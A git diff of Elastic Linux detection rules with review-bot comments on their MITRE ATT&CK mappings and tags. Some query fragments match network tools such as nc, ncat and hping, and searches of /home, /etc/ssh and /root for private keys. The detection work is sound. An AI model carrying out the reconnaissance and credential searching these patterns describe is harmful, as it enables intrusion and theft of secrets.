@@ -111,11 +123,37 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_ping_sweep_detected.toml b/rules/linux/discovery_ping_sweep_detected.toml index 081d7c941ab..1cffefe920a 100644 --- a/rules/linux/discovery_ping_sweep_detected.toml +++ b/rules/linux/discovery_ping_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -110,11 +110,6 @@ process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" 
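Review bot: The two new `[[rule.threat]]` entries attach T1543 Create or Modify System Process (Persistence) and T1556 Modify Authentication Process (Credential Access) to a rule named for PAM version discovery, and the tags hunk of this file adds the matching `Tactic: Persistence` and `Tactic: Credential Access` tags. The rule's query is outside the hunk, but nothing visible suggests it observes a PAM modification rather than a version query, so these mappings attribute techniques the detection does not see. Consider keeping only the Discovery mapping, or state in the description that the extra tactics are meant to reflect likely follow-on activity.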
@@ -124,6 +119,7 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threshold] field = ["host.id", "process.parent.entity_id", "process.executable"] value = 1 diff --git a/rules/linux/discovery_polkit_version_discovery.toml b/rules/linux/discovery_polkit_version_discovery.toml index 7bd3c7400e3..2420b1dc14c 100644 --- a/rules/linux/discovery_polkit_version_discovery.toml +++ b/rules/linux/discovery_polkit_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -111,9 +111,9 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml index c953db6b472..413d337fc5a 100644 --- a/rules/linux/discovery_private_key_password_searching_activity.toml +++ b/rules/linux/discovery_private_key_password_searching_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
@@ -110,30 +110,25 @@ process.command_line like ("*/home/*", "*/etc/ssh*", "*/root/*", "/") [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/discovery_proc_maps_read.toml b/rules/linux/discovery_proc_maps_read.toml index cc4db1da87b..986cceed84d 100644 --- a/rules/linux/discovery_proc_maps_read.toml +++ b/rules/linux/discovery_proc_maps_read.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
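Review bot: The first `[[rule.threat]]` entry on the new side now contains only `[rule.threat.tactic]` TA0007 Discovery and no `[[rule.threat.technique]]` (T1083 was removed and nothing replaces it), leaving a tactic-only mapping; the security_file_access_via_common_utility hunk ends up with the same tactic-only shape. Tactic-only entries are valid TOML but drop the technique-level link the rule previously carried. Also, changing the sub-technique from T1552.004 Private Keys to T1552.001 Credentials In Files reads as inverted for a rule named `discovery_private_key_password_searching_activity`, where Private Keys is the more specific match; please confirm this is intended.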
@@ -86,7 +86,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Credential Access", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,3 +127,21 @@ reference = "https://attack.mitre.org/techniques/T1057/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.007" +name = "Proc Filesystem" +reference = "https://attack.mitre.org/techniques/T1003/007/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_process_capabilities.toml b/rules/linux/discovery_process_capabilities.toml index ae91749e8cf..41b4c8bda26 100644 --- a/rules/linux/discovery_process_capabilities.toml +++ b/rules/linux/discovery_process_capabilities.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -101,9 +101,9 @@ In Linux environments, the `getcap` command is used to list file capabilities, w framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml index cb7bc9afe40..c80d995820a 100644 --- a/rules/linux/discovery_security_file_access_via_common_utility.toml +++ b/rules/linux/discovery_security_file_access_via_common_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/12" [rule] author = ["Elastic"] 
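Review bot: Replacing T1083 File and Directory Discovery with T1057 Process Discovery in the process_capabilities hunk attributes a technique about enumerating running processes to a query over file capability metadata; the hunk's own header context says `getcap` is used to list file capabilities. T1083 or T1082 fit the observed behaviour better, and if T1057 is deliberate the description should say why. The tactic stays TA0007, so the `Tactic: Discovery` tag remains consistent.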
@@ -83,7 +83,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,29 +125,6 @@ process.args like ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_sudo_allowed_command_enumeration.toml b/rules/linux/discovery_sudo_allowed_command_enumeration.toml index aa6bd718253..9c5015f5db1 100644 --- a/rules/linux/discovery_sudo_allowed_command_enumeration.toml +++ b/rules/linux/discovery_sudo_allowed_command_enumeration.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -106,13 +106,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_suid_sguid_enumeration.toml b/rules/linux/discovery_suid_sguid_enumeration.toml index 4d18a674e20..ce279082884 100644 --- a/rules/linux/discovery_suid_sguid_enumeration.toml +++ b/rules/linux/discovery_suid_sguid_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/24" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -80,7 +80,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -105,3 +113,29 @@ reference = "https://attack.mitre.org/techniques/T1083/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml index 3a9839168b7..e78382373b9 100644 --- a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml +++ b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
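Review bot: The third `[[rule.threat]]` entry added here maps tactic TA0003 Persistence, but the tags hunk for this file adds only `"Tactic: Privilege Escalation",`, so `Tactic: Persistence` is absent from `tags` — a tag/threat mismatch that a tactic-tag consistency check would report. Either add `"Tactic: Persistence",` to the tags list or drop the entry. The entry also carries no `[[rule.threat.technique]]`, so as written it is a tactic-only mapping with nothing for analysts to pivot on.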
@@ -87,7 +87,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Tactic: Reconnaissance", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -103,24 +112,37 @@ not (process.name in ("nc.traditional", "nc", "ncat", "netcat") and process.args framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1040" -name = "Network Sniffing" -reference = "https://attack.mitre.org/techniques/T1040/" +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/discovery_suspicious_which_command_execution.toml b/rules/linux/discovery_suspicious_which_command_execution.toml index 5012b1d148f..732545b5d3b 100644 --- a/rules/linux/discovery_suspicious_which_command_execution.toml +++ b/rules/linux/discovery_suspicious_which_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
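Review bot: The new third entry maps in-container execution of a network tool to TA0043 Reconnaissance / T1595 Active Scanning, and the tags hunk adds `Tactic: Reconnaissance` to match. In ATT&CK, Reconnaissance covers pre-compromise information gathering, whereas this rule observes a process already running inside a container; internal scanning from that position is the T1046 Network Service Discovery mapping this hunk already keeps under Discovery. Consider dropping the Reconnaissance entry and its tag, or explaining the intent in the description. The T1105 Ingress Tool Transfer mapping is plausible for the tools named in the header context but cannot be confirmed from the query, which is outside the hunk.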
@@ -84,13 +84,14 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_unusual_user_enumeration_via_id.toml b/rules/linux/discovery_unusual_user_enumeration_via_id.toml index 21c52e8d1b2..e855e9a3297 100644 --- a/rules/linux/discovery_unusual_user_enumeration_via_id.toml +++ b/rules/linux/discovery_unusual_user_enumeration_via_id.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -105,24 +105,9 @@ sequence by host.id, process.parent.entity_id with maxspan=1s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.001" -name = "Local Groups" -reference = "https://attack.mitre.org/techniques/T1069/001/" - -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1087/001/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml index d333b15eb7c..db90a1ad7af 100644 
--- a/rules/linux/discovery_virtual_machine_fingerprinting.toml +++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -104,7 +104,17 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -128,32 +138,9 @@ process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_yum_dnf_plugin_detection.toml b/rules/linux/discovery_yum_dnf_plugin_detection.toml index 16b1effaea4..2d0397313ad 100644 --- a/rules/linux/discovery_yum_dnf_plugin_detection.toml +++ b/rules/linux/discovery_yum_dnf_plugin_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
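Review bot: Both T1497.001 System Checks entries are removed and replaced by a single T1082 System Information Discovery technique, and the tags hunk drops `Tactic: Defense Evasion`. Collapsing the duplicated T1497 block that previously sat under both tactics is a good fix, but T1497.001 is the ATT&CK sub-technique that specifically describes virtual-machine and sandbox detection, so `discovery_virtual_machine_fingerprinting` loses its most precise mapping. Keeping one Defense Evasion entry with T1497.001 (and its tag) alongside the new Discovery entry would preserve that link without reintroducing the duplicate.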
@@ -113,14 +113,9 @@ not ?process.parent.executable == "/usr/lib/venv-salt-minion/bin/python.original framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml index f73a2c08c13..6310d47ea9b 100644 --- a/rules/linux/execution_abnormal_process_id_file_created.toml +++ b/rules/linux/execution_abnormal_process_id_file_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -97,7 +97,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -135,19 +144,15 @@ file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml index afd71b6364b..ecf13768813 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -123,16 +123,6 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml index 7a0b343479e..e3029462837 100644 
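Review bot: The new mapping T1106 Native API under TA0002 Execution does not describe what this rule observes: per the hunk header context it is a `new_terms` rule on `file.extension:(pid or lock or reboot)` under `/var/run/*` or `/run/*`, and creating a PID/lock file is not an API-based execution technique. The removed T1036.005 Match Legitimate Resource Name or Location captured the abnormal-pid-file behaviour that the retained `Threat: BPFDoor` tag refers to, so please confirm the intent or restore the Masquerading/Defense Evasion entry together with its `Tactic: Defense Evasion` tag (the tags hunk of this file swaps that tag for `Tactic: Execution`). The trailing `+` adds a blank line before `[rule.new_terms]`, which is fine.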
--- a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -103,7 +103,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Crowdstrike", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Execution", + "Data Source: Crowdstrike", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + +] timestamp_override = "event.ingested" type = "eql" query = ''' 
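Review bot: The rebuilt `tags` array in the lp_user_execution hunk contains an empty element line (the bare `+` between `+ "Resources: Investigation Guide",` and `+]`), which none of the other expanded tag lists in this commit have; drop it so `"Resources: Investigation Guide",` is followed directly by `]`. The `Tactic: Initial Access` tag is also removed here and the matching TA0001/T1190 entry is removed in the file's threat hunk, so tags and threat remain consistent; whether dropping Initial Access from a rule that keeps `Use Case: Vulnerability` is intended deserves a sentence in the description.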
@@ -123,29 +135,11 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml index 9e4b83c0aab..9a89825b302 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
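Review bot: Replacing T1059/T1059.004 with T1203 Exploitation for Client Execution and deleting the T1190 Exploit Public-Facing Application entry leaves this cupsd/foomatic-rip rule mapped only to a client-side technique, although by its name and the `Use Case: Vulnerability` tag it fires on a print daemon spawning processes as the `lp` user, which is arguably the server-side exploitation T1190 described. Unless the rule is deliberately narrowed to local print-job abuse, keep `id = "T1190"` under `id = "TA0001"` alongside T1203 and put `"Tactic: Initial Access"` back in `tags`. Whichever set is kept, the tag list and the tactic list must agree.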
